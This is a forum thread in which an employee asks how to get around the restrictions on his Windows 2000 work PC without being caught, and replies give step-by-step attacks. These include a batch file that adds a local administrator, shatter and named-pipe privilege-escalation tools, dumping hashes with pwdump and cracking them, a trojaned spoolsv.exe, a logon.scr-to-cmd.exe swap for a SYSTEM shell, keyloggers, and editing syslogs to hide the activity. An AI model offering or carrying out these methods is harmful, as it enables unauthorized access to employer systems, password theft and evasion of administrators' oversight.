I've got a brand new pc here at work, and was obviously happy about it, until i found out the new system restrictions they brought me with it.
I can't install new programs, access restricted webpages and so on.
My question is: Is there any way i can do whatever the (filtered) i want, and most important, not get caught.
There isn't much to do here, so i'm always doing some freelance stuff, wich sometimes require me to install apps, use instant messengers and ftp.

*It is important for me that my boss or the network administrators don't see what i'm doing - it's a shitty job, but i need the fckng money.

What version of windows are you using?

Thing is, if your network admin wanted to check for alterations or even if it was routine upgrading etc, it wouldnt be too difficult to see that you were messing about with the restrictions in place.

Is it worth losing your job over?

Yes, i forgot to mention we're using win2000 here.
And yes, it is pretty much worth the risk, i double my pay doing freelances in my work hours.
About upgrades and stuff like that, i know when they're coming, so i can uninstall all the apps.

google for polundo.exe. Policy Undo. I put it in my startup directory, but you can run it when you want to. I used to use a tool called getadmin a while back, but I don't knwo if it works for 2k/xp. Reset the admin password using the linux boot disk. You'll have to google for that one, too. I don't have access to it.

Quick suggestion here.. it is very much possible that you are already an administrator with network restrictions. So, you can add your own admin account with the following batch file commands...

@echo off
net user USER PASS /add >> see.txt
net localgroup Administrators USER /add >> ifworked.txt

put that in notepad, save it as NAME.BAT and then run it. check see.txt and ifworked.txt to see if it says "The command was completed sucessfully" or whatever.

This worked at my school, so I now admin the class when I want. Also, if you want to quit anytime send your boss a netsend message

@echo off
net send PCNAME (filtered) you, this job blows and paid too little!

You could also try Getad.exe and Getad2.exe
They use the shatter type exploit on the NetDDE window to get Administrative Privs.

URL: http://imm.uinc.ru/getad/

-Maximum

another one's pipeupadmin...
from maceo himself:
Windows 2000 uses predictable named pipe names for controlling
services. Any user process can create a named pipe with the next
name and force a service, they can start, to connect to the pipe.
Once connected, the user process can impersonate the service,
which in most cases runs in the SYSTEM account.

dogmile's gone now... but
here ya go...

thanks everyone for posting some suggestions.
i'll try them out tomorrow, then i'll let you know if i get fired or something.

New System ummm nothing too lose FORMAT and start fresh

ok try this :

Download pwdump2 , ( www.packetstormsecurity.nl ) and try to execute it with the following line ( @ your comp @ work of course )

pwdum.exe>pw.txt , if it is successfull you see in pw txt your username and some others and the encrypted password . Copy the txt @ a floppy and take it home . Download L0phtcrack4 crack decrypt the passwords on pw.txt . Now you have the administrator pw and you can login with his password ( in most cases the admins use for every pc the same pw , stupid i know ) .

If in the pw.txt is not your username , but an errormessage thant try Pipeup admin , as mentioned earlier , now you have Systemrights . K now do the thing with pwdump , and now set your account on normal rights back !!!! .

For freelancing work just login as admin . And think @ the syslogs . They show @ what time what user logged in etc ... you have to edit them

So have fun and never get caught ^^

if not sp 3 is installed...
you can get your self into an admin procces...

it worked for me ( local testing ofcourse )

just search your exploit archives for the exploit that let`s you change the procces into an system / admin procces

Well guys, i guess the restrictions are a bit to high over here, none of your tips worked. the net user command is disabled, pipeup gives error messages, pwdump won't work either.
Guess i'll just install a keylog, call tech support, get the password and then try to change my account privileges. It's stupid, but i guess it'll work.
Anyway, thanks for posting your suggestions, i learned some stuff from them.

Sorry, but how are you going to install a keylogger if you can't install anything.

If you have physical access, you own the machine. There are many linux utils that allow you to reset passwords and the like. What works very simply is to boot into linux or the recovery console. Replace spoolsv.exe with a trojaned version that creates an admin account. You have to rename spoolsv in the dllcache folder and any service pack folders at the same time otherwise when you reboot windows file protection will kick in and delete your trojan.
reboot, spoolsv.exe will run as system and create your account.
Log in with your new account, kill your trojan, delete it, rename the original files back, restart spoolsv and you're done.

This works beautifully on Domain controllers.

I'll post a trojan later when I have more time

bump

new ideas/programs appreciated since we at school have win2000 systems now. I need to install some apps but i am not priveleged.

debploit/pipeup are easiest methods, since its internal you can also try methods that would be blocked by firewall usually (RPC,wks etc). Shatter is probably your best bet though, because while Windows can patch the public methods used to create the shatter attack, they can't patch the real hole (Kinda like RPC, but worse). So if your real good you can create your own shatter attack and... *g* admin.

I find the best way to get passwords is by using this interesting thing
http://www.keyghost.com/hardware_keylogger.htm

They have more than one type out there , search around (google)

I got the same problem and nothing is working but i am being somewhat monitored(room full of people and one admin sometimes look over) any help would be very appreciated.

Edit: btw I recently registered and can't post new topics, why?

Edit: NM I read the stickys a second ago I just wanted to ask a question badly and couldn't find it asked on the forum allready.

l0phtcrack is a pain in the butt. Go with cain and abel. Its free and just as good.

I would use Cain myself but if you can't install software on the PC then just get a burned copy of Knoppix STD and run it from the CD. It has all the tools you will need to reset the admin password. You also could use ERD Commander and just use the locksmith toll it has..... So many ways to get into a box if your on site I have a USB Flash drive with lots of bootable tools for just this kind or issue. Best of luck and be careful not to get fired.

Slimjim100

how can i disbled net.exe from running , because there was few person using net command to create admin privilage method and screwing my pc.is that any way to prevent it, i have admin privilage and we are using windows xp and 2000 and i am still at learning stage. thank in adv.

I think this was discussed before here http://www.governmentsecurity.org/forum/in...t=0&#entry36515

Good luck,

Slimjim100

Hello i would like to bring your atention to this little thing, it is a boot disk for nt and since 2000 is based on an nt system it will work. runs in a linux shell and edits the sam files before you log on. reset the admin password to * and login.

link: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

chars then.

use spawn shell, it´s for win2000, w2k have as standard to use scheduler as administrator rights, i hope i can help you

to start a scheduled task in win2k with admin rights you have to have the admin password. all the pipe up tool have been fixed with servpk 2 or 3 although a shatter attack will still work. if you use knoptix or something else to change your password you'll only change it on domain local machine and not in AD so you'll still be a regular |user on the network

if you have an av on your machine some of them with .chm help files allow you to open a browser page (by right clicking on the title bar) that functions with system privilages so you might be able to install proggies. but even if you can run apps as admin some firewall allow unrestricted web access by machine (ip & mac) your better off finding a proxy thats allowed, unless of course they use content blocking instead of just denying certain sites. of course you can always break into an admin machine and install a proxy on it if your not afraid of loosing your job and maybe getting arrested.

yeah umm look your changing the admin password before boot with a unix shell (see above post) with boot disk i don't think windows can protect against this! lol umm nahh windows pks umm nahh! like protecting buffer overflows lol!

Got to thinking of a quick txt I wrote a long while ago, maybe it can help someone.

Personally I use "Windows XP/2000/Nt key" to set the admin password to 12345, then make it run pwdump instead of login screensaver, take the hash, crack it and reset it to the first password.. no one knows anything, and you got the admin pass..

-------------------------------------------

Obtaining the administrator password

By: Niklas / The_deViL Contact me if you want anything. Please note that I am no expert of any kind.

(!) Note: I take no responsibility for what you might do. And I doesn't clame that this information is correct.
(!) Obtaining the administrator password in Windows nt/2k/xp. There are plenty of ways doing this. I will describe some diffrent ways. Remember this is for educational purpose only. I am no expert in this. And I doesn't clame to be either. But this guide might help other people to learn.
(!) Note: Backup everything before you begin. Changes are you might destroy your computer. You have been warned. Okay? (!!) Note: I am on win 2k. This article is written based on my knowledge.

Introduction

This article describes how to get a hold of the administrator password on Windows Nt/2k/xp. This is a rather simple article on password security. As stated above I am on windows 2000. I haven't tested these methods myself on other NT or XP.

The SAM File
The sam file is (one of the locations) were the password (encrypted ofcourse) is stored. You can't just goto the dir and copy it. It is slightly more complicated than that.
(!) Note: On Win 2k or newer it (most likely) _will_ be syskey encrypted. This means your favorite cracker won't break it. But there is other ways to get the none-syskey encrypted password. Check the section named Pwdump(2)

Directory were SAM is stored.
1. (The active sam file) \"windows folder(winnt/windows)"\system32\config\
2. (The "repair" sam file (Used when creating rescue/repair disc I belive)) \"windows folder"\repair\

The same file is named SAM or SAM._ Or similar.

(!) Note: The second SAM is most likely to be removed. Since it is for the repair/rescue disc
(!!) Note: The SAM file(s) are hidden. If you go threw windows you probably won't see them.

If you can see them, try to simply copy them. Since you probably are a regular user (Otherwise you should goto the section "Pwdump") you cannot copy (probably you cant even see) the file. But thats okay.

So how do we get ahold of the SAM file? You are going to need a boot disc (or boot cd). The bootdisc for windows 98 works great with some minor changes. If your computer is using NTFS (Probably does) You need a program called NTFSDOS. Make a search on google for it.

Step-by-step:
1. Make a boot disc (I actually used windows 98 bootdisc (Using a prog called win98se-bootfloppy.exe))
2. Copy the file NTFSDOS.exe to it. If you used win 98se bootdisc there is no space, remove the fdisc.exe since we don't need it.
3. Boot up the computer (You might need to change the boot order in BIOS)
4. When you are in DOS. If the computer is using NTFS (Not FAT32) run NTFSDOS.exe and it will say something similar to: NTFS partion mounted to X: (Were X is the letter for the drive)
5. Go to the partition were your windows installation is. If your partition is X: simply just write: x:
6. Go to your windows\system32\config directory. Copy the SAM._ File (Might not be that file name) to list the files write 'dir' or 'dir/p' (Without the ''). The copy syntax for copying a file to a: (You might need to insert a blank disc) is: copy filename a:
7. Open the sam file in your favorite cracker such as L0phtCrack.

Success (!?).

Pwdump(2)

Pwdump, or more exacly Pwdump2, is a great program. You see, the sam file is syskey encrypted. But Pwdump2 (written by Todd Sabin) pulls out the password hash(es) from the OS memory. The none-syskey encrypted password hash(es). By using Pwdump2 you can get the none-syskey encrypted password file. You can then use your favorite cracker. But the Pwdump requires admin rights to run.

Pwdump2 is best runned from a command promt (Must be running as admin).

Step-by-step (If you got administrator rights on the computer):
1. Download Pwdump2. (Hint: www.google.com)
2. Start > Run > Cmd. Goto the directory were you have Pwdump2.exe and run the command: pwdump2 > password.txt
3. Simply import the password.txt (contains the password hashes) to you favorite password cracker (On L0phtCrack that is Import > Import from PWDUMP file).

If you haven't got administrator rights: First of all you are going to download Pwdump2.zip (Hint: www.google.com) and unpack it.

We must have a command promt running as localhost (Admin).
One way of doing this is replacing the logon.scr with cmd.exe. Simple rename the logon.src to logonbak.src and copy cmd.exe to logon.src.
Then reboot your computer and when the login (Or the press-ctrl-alt-del key now) screen comes up simply wait. It will take a while. Anywere between 5-25 minutes. Then windows tried to run the default
logon screen-saver (logon.src) and instead it runs the renamed cmd.exe as localhost (Admin).

Then simply go to the directory where pwdump2 is and write: pwdump2 > password.txt This extracts the none-syskey encrypted from the OS memory and save it into password.txt. Then simply import the password.txt (contains the password hashes) to you favorite password cracker (On L0phtCrack that is Import > Import from PWDUMP file).

Success (!?).
Resetting the administrator password.

There is diffrent ways of doing this. You can use a software called Windows XP/2000/Nt key. The plus with this program is that you can later on reset it back to it's original settings. Url: http://www.lostpassword.com/ Other way is to use a diffrent windows boot-loader. More information about this can be found on various sites on the net. I can't say I got enough knowledge to write an article about this. Maybe later

Conclusion

Hopefully you learned something form this article. That was why I wrote it.

Written by: Niklas
Nickname: The_deViL

Email:
Icq:

Contact me if you want anything. Please note that I am no expert of any kind. I simply want to knowledge.